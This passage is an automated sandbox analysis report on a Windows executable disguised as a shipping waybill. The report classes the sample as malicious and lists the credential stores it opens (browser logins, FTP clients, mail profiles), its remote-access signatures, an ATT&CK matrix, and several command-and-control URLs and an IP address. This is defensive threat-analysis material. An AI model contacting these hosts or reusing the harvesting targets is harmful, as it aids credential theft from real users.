                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                        Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
                        Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                        Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: 3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1735740544.0000000004C4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1734651878.000000000313D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1735740544.0000000004AB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe PID: 5516, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe PID: 6536, type: MEMORYSTR
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 00000003.00000002.2873103232.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.40c9970.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.9480000.12.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.40c9970.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.9480000.12.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1735740544.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1739256107.0000000009480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeCode function: PopPassword3_2_0040D069
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeCode function: SmtpPassword3_2_0040D069
                        Source: Yara matchFile source: 3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1735740544.0000000004C4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1734651878.000000000313D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1735740544.0000000004AB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.40c9970.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.9480000.12.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.40c9970.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.9480000.12.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1735740544.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1739256107.0000000009480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                        DLL Side-Loading
                        1
                        Access Token Manipulation
                        1
                        Masquerading
                        2
                        OS Credential Dumping
                        31
                        Security Software Discovery
                        Remote Services1
                        Email Collection
                        1
                        Encrypted Channel
                        Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts111
                        Process Injection
                        1
                        Disable or Modify Tools
                        2
                        Credentials in Registry
                        1
                        Process Discovery
                        Remote Desktop Protocol11
                        Archive Collected Data
                        1
                        Ingress Tool Transfer
                        Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                        DLL Side-Loading
                        31
                        Virtualization/Sandbox Evasion
                        Security Account Manager31
                        Virtualization/Sandbox Evasion
                        SMB/Windows Admin Shares2
                        Data from Local System
                        1
                        Non-Application Layer Protocol
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                        Access Token Manipulation
                        NTDS1
                        File and Directory Discovery
                        Distributed Component Object ModelInput Capture111
                        Application Layer Protocol
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
                        Process Injection
                        LSA Secrets13
                        System Information Discovery
                        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                        Deobfuscate/Decode Files or Information
                        Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
                        Obfuscated Files or Information
                        DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job22
                        Software Packing
                        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                        Timestomp
                        /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                        DLL Side-Loading
                        Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe100%Joe Sandbox ML
                        No Antivirus matches
                        No Antivirus matches
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        http://kbfvzoboss.bid/alien/fre.php100%URL Reputationmalware
                        http://alphastand.top/alien/fre.php100%URL Reputationmalware
                        http://www.ibsensoftware.com/0%URL Reputationsafe
                        http://www.tiro.com0%URL Reputationsafe
                        http://alphastand.win/alien/fre.php100%URL Reputationmalware
                        http://www.goodfont.co.kr0%URL Reputationsafe
                        http://www.goodfont.co.kr0%URL Reputationsafe
                        http://alphastand.trade/alien/fre.php100%URL Reputationmalware
                        https://www.chiark.greenend.org.uk/~sgtatham/putty/00%URL Reputationsafe
                        http://www.carterandcone.coml0%URL Reputationsafe
                        http://www.sajatypeworks.com0%URL Reputationsafe
                        http://www.typography.netD0%URL Reputationsafe
                        http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                        http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                        http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                        http://www.sandoll.co.kr0%URL Reputationsafe
                        http://www.urwpp.deDPlease0%URL Reputationsafe
                        http://www.sakkal.com0%URL Reputationsafe
                        http://www.founder.com.cn/cn/bThe0%Avira URL Cloudsafe
                        http://45.77.223.48/~blog/?ajax=ee0%Avira URL Cloudsafe
                        http://www.founder.com.cn/cn/cThe0%Avira URL Cloudsafe
                        http://www.founder.com.cn/cn0%Avira URL Cloudsafe
                        http://www.zhongyicts.com.cn0%Avira URL Cloudsafe
                        http://www.founder.com.cn/cn/bThe0%VirustotalBrowse
                        http://www.zhongyicts.com.cn1%VirustotalBrowse
                        http://www.founder.com.cn/cn/cThe0%VirustotalBrowse
                        http://www.founder.com.cn/cn0%VirustotalBrowse
                        No contacted domains info
                        NameMaliciousAntivirus DetectionReputation
                        http://kbfvzoboss.bid/alien/fre.phptrue
                        • URL Reputation: malware
                        unknown
                        http://alphastand.top/alien/fre.phptrue
                        • URL Reputation: malware
                        unknown
                        http://alphastand.win/alien/fre.phptrue
                        • URL Reputation: malware
                        unknown
                        http://alphastand.trade/alien/fre.phptrue
                        • URL Reputation: malware
                        unknown
                        http://45.77.223.48/~blog/?ajax=eetrue
                        • Avira URL Cloud: safe
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.apache.org/licenses/LICENSE-2.0Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://www.fontbureau.comAwb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://www.fontbureau.com/designersGAwb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.fontbureau.com/designers/?Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.founder.com.cn/cn/bTheAwb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmpfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.fontbureau.com/designers?Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.ibsensoftware.com/Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.tiro.comAwb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://upx.sf.netAmcache.hve.6.drfalse
                                    high
                                    http://www.fontbureau.com/designersAwb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.goodfont.co.krAwb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      https://www.chiark.greenend.org.uk/~sgtatham/putty/0Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exefalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.carterandcone.comlAwb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.sajatypeworks.comAwb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.typography.netDAwb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fontbureau.com/designers/cabarga.htmlNAwb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.founder.com.cn/cn/cTheAwb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.galapagosdesign.com/staff/dennis.htmAwb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.founder.com.cn/cnAwb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.fontbureau.com/designers/frere-user.htmlAwb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.jiyu-kobo.co.jp/Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.galapagosdesign.com/DPleaseAwb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fontbureau.com/designers8Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.fonts.comAwb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.sandoll.co.krAwb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.urwpp.deDPleaseAwb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.zhongyicts.com.cnAwb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • 1%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.sakkal.comAwb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs
                                              IPDomainCountryFlagASNASN NameMalicious
                                              45.77.223.48
                                              unknownUnited States
                                              20473AS-CHOOPAUStrue
                                              Joe Sandbox version:40.0.0 Tourmaline
                                              Analysis ID:1431478
                                              Start date and time:2024-04-25 09:41:07 +02:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 6m 27s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:11
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              Detection:MAL
